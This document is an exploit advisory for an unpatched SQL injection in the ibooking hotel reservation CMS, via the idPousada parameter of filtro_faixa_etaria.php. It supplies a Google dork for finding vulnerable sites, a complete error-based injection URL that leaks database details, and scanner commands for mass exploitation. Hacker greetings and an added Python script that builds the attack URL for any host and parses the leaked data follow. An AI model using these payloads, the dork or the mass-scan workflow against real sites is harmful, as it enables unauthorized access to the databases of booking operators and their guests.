# VENDOR: www.ibooking.com.br
# Vulnerable versions: ALL
# File: filtro_faixa_etaria.php
# Parameter: idPousada (GET)
# DORK: intext:"Desenvolvido por ibooking"
# Reported: 15/10/2015
# ---------------------------------------------------------------------------------
# AUTHOR: Cleiton Pinheiro / Nick: googleINURL
# EMAIL: inurlbr@gmail.com
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin: http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# EXA: http://exploit4arab.net/author/248/Cleiton_Pinheiro
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil
# ---------------------------------------------------------------------------------

# Description:
The vulnerable request is issued by a JavaScript function found within /motor-de-reservas. The idPousada GET parameter reaches an SQL query without sanitization. The PoC below is an error-based (double-query) injection: COUNT(*) grouped by FLOOR(RAND(0)*2) forces a "Duplicate entry" error in MySQL, and the duplicate key text, which carries the selected value between two marker strings, is returned in the page, so the database version is read straight out of the error message.

# JavaScript code responsible for the vulnerable request:
$.ajax({
    type: "GET",
    url: "filtro_faixa_etaria.php",
    data: "qtde_quartos=1&idPousada=61",
    success: function(xml){
        $("#filtro_faixa_etaria").html(xml);
    }
});

# Vulnerable URL:
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61

# POC:
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+(SQL_INJECTION)

# Example:
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)

The hex literal 0x203a3a494e55524c42525f56554c4e3a3a20 decodes to " ::INURLBR_VULN:: "; it wraps the leaked value on both sides so that the result is easy to locate in the response.

# Return print:
http://1.bp.blogspot.com/-vttfzGtov5g/VfiRJhIDwVI/AAAAAAAABVY/tPbBSiHft7c/s1600/Captura%2Bde%2Btela%2Bde%2B2015-09-15%2B18%253A42%253A51.png

# Mass exploitation using the INURLBR scanner
#
# Download: https://github.com/googleinurl/SCANNER-INURLBR

# COMMAND

# SETTING THE SEARCH DORK:
--dork 'YOUR_DORK'
# USE:
--dork 'intext:"Desenvolvido por ibooking"'

# SETTING OUTPUT FILE:
# USE:
-s 'ibooking.txt'

# SETTING GET EXPLOIT STRING:
--exploit-get 'EXPLOIT_GET'
# USE:
--exploit-get '/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)'

# SETTING TYPE OF VALIDATION:
# USE:
-t 3
The third validation type combines the first and second types. It also connects to the target through the GET method: the string given in --exploit-get is appended directly to the URL.
Example:
--exploit-get '/index.php?id=1&file=conect.php'
INJECTED URL: http://www.target.br/index.php?id=1&file=conect.php

# SETTING VALIDATION STRING:
Specify the string the script uses for validation:
Example:
-a {string}
Usage: -a 'hello world'
If that value is found in the target's response, the target is considered vulnerable.
# USE:
-a 'INURLBR_VULN'
The INURLBR_VULN value is the same string that the --exploit-get payload carries in hexadecimal form (0x203a3a494e55524c42525f56554c4e3a3a20 = " ::INURLBR_VULN:: "). When the injection succeeds the marker comes back inside the MySQL error message, so finding it in the response confirms the injection.

# FULL COMMAND:
php inurlbr.php --dork 'intext:"Desenvolvido por ibooking"' -s 'ibooking.txt' --exploit-get '/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)' -t 3 -a 'INURLBR_VULN'

# MORE INFORMATION:
http://blog.inurl.com.br/2015/09/0day-ibooking-cms-injecao-de-sql-e.html

+--------------------------------------------------------------------------------------+
|                                                                                      |
|                                    G R 3 3 T S                                       |
|                                                                                      |
+--------------------------------------------------------------------------------------+
* r00t-3xp10t, Jh00n, chk_, Unknownantisec, sl4y3r 0wn3r, hc0d3r, arplhmd, 0x4h4x
* Clandestine, KoubackTr, SnakeTomahawk, SkyRedFild, Lorenzo Faletra, Eclipse, shaxer
* dd3str0y3r, Johnny Deep, Lenon Leite, pSico_b0y, Bakunim_Malvadão, IceKiller, c00z
* Oystex, rH, Warflop, se4b3ar, Pablo Verlly Moreira
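The PoC payload and the -a validation described above, as an added example written for this page (it is not part of the advisory and not code from the INURLBR scanner): a Python helper that builds the error-based request for a host, applies the same "marker reflected means vulnerable" check that -t 3 with -a 'INURLBR_VULN' performs, and then parses MySQL's "Duplicate entry" error for the text between the two marker occurrences. The host name, the function names and both sample responses are assumptions; the responses are constructed here, not captured from any site.

```python
"""Added example (not from the advisory or the INURLBR scanner).

Builds the error-based injection request from the PoC and recovers the
value leaked in MySQL's "Duplicate entry" error. Function names, the host
and the sample responses are assumptions made for this example.
"""
import re
import urllib.parse
from typing import Optional

# Hex literal the PoC places on both sides of the leaked value; it is also
# the validation string INURLBR looks for with -a 'INURLBR_VULN'.
MARKER_HEX = "203a3a494e55524c42525f56554c4e3a3a20"
MARKER = bytes.fromhex(MARKER_HEX).decode("ascii")   # " ::INURLBR_VULN:: "
VALIDATION_STRING = "INURLBR_VULN"

TARGET_PATH = "/motor-de-reservas/filtro_faixa_etaria.php"  # path from the advisory

# MySQL reports the colliding GROUP BY key as the duplicate entry.
DUP_ENTRY_RE = re.compile(r"Duplicate entry '(.*?)' for key")


def build_payload(id_pousada: int = 61, marker_hex: str = MARKER_HEX) -> str:
    """idPousada value used by the PoC: the double-query error-based trick.

    RAND(0) is deterministic, so FLOOR(RAND(0)*2) yields 0,1,1,0,1,1,... while
    GROUP BY fills its temporary table; the repeated key makes MySQL raise
    'Duplicate entry', and the key text (our CONCAT) is echoed in the error.
    """
    leak = ("concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,"
            "0x20,@@GLOBAL.version_compile_machine)")
    return (f"{id_pousada} AND (SELECT 2692 FROM(SELECT COUNT(*),"
            f"CONCAT(0x{marker_hex},(SELECT ({leak})),0x{marker_hex},"
            f"FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)")


def build_url(host: str, qtde_quartos: int = 3, id_pousada: int = 61) -> str:
    """Full GET URL; urlencode() turns spaces into '+' as the advisory's URL does."""
    query = urllib.parse.urlencode(
        {"qtde_quartos": qtde_quartos, "idPousada": build_payload(id_pousada)})
    return f"http://{host}{TARGET_PATH}?{query}"


def is_vulnerable(body: str) -> bool:
    """The -t 3 / -a check: validation string reflected => marked vulnerable."""
    return VALIDATION_STRING in body


def extract_leak(body: str, marker: str = MARKER) -> Optional[str]:
    """Text between the two markers inside the duplicate-entry value, or None."""
    m = DUP_ENTRY_RE.search(body)
    if not m:
        return None
    entry = m.group(1)
    start = entry.find(marker)
    if start < 0:
        return None
    start += len(marker)
    end = entry.find(marker, start)
    # Older MySQL versions truncate the reported entry to 64 characters, so
    # the closing marker can be cut off; keep whatever came back in that case.
    return entry[start:] if end < 0 else entry[start:end]


# Constructed sample responses (not real captures), shaped like a PHP page
# that echoes mysql_error() after a failed query.
SAMPLE_RESPONSE = (
    '<select name="faixa_etaria"></select>\n'
    "Duplicate entry ' ::INURLBR_VULN:: 5.5.44 debian-linux-gnu x86_64"
    " ::INURLBR_VULN:: 1' for key 'group_key'\n"
)
CLEAN_RESPONSE = '<select name="faixa_etaria"><option value="1">Adulto</option></select>\n'


if __name__ == "__main__":
    print(build_url("www.target.br"))           # assumed host name
    for body in (SAMPLE_RESPONSE, CLEAN_RESPONSE):
        print(is_vulnerable(body), extract_leak(body))
```

The check in is_vulnerable() is deliberately as loose as the scanner's: any page that happens to contain the validation string is flagged, so extract_leak() is the step that separates a reflected error from a false positive.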